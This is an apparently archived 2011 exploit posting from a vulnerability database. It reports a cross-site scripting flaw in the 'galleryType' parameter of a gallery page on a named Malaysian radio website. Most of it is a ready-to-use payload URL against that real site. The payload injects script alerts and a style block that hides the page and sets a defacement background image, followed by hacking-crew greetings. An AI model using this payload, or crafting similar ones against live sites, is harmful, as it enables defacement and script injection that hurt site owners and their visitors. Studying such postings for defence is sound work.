Hotfm.com.my Cross Site Scripting

2011-11-08T00:00:00
ID PACKETSTORM:106707
Type packetstorm
Reporter Ryuzaki Lawlet
Modified 2011-11-08T00:00:00

Description

                                        
                                            `# Exploit Title: Hotfm.com.my Cross Site Scripting Vulnerability  
# Date: 08/11/2011 - 04:00am  
# Author: Ryuzaki Lawlet  
# Website: http://jusryuz.blogspot.com  
# Tested On: WinXP  
# Platform: ASP  
# Email: ryuzaki_l@y7mail.com  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
[$] Vulnerable : http://site.com.my/[path]/galeri.asp?galleryType=  
  
[$] Preview Sites:  
  
[~]  
http://hotfm.com.my/jamtour2011/galeri.asp?galleryType=wo.0t??%20by%20Ryuzaki%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22wo.0t??%20by%20Ryuzaki%22%29%  
3C/script%3E%3Cscript%3Ealert%28%22http://justryuz.blogspot.com%22%29%3C/script%3E%3Cscript%3Ealert%28%22Cyb3rSec%20Crew%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28https://fbcdn-profile-a.akamaihd.net/hprofile-ak-snc4/277062_207390472645570_423082005_n.jpg%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3C/div%3E#185  
[XSS]  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# wo.0t?? Ryuzaki with you :D  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# Greetz: Misa Cyb3rSec, Ben Cyb3rSec, Xay Cyb3rSec, AntuWebHunt3r, Alex Newbie3vilC063s, PK Newbie3vilC063s, Black_List Rival  
ReD John, CyberFalconz Crew  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
#[Cyb3rSec Crew + MyHex Crew + Newbie3vilc063s + Malaysian Crew + CYBER 4RMY + T3 Ð Ha©Ke® + M4tr1xCh40s Cr3w]  
  
# Special To : Putera Army - Rileks Crew , H3x4 Crew & Newbie3vilC063s  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
`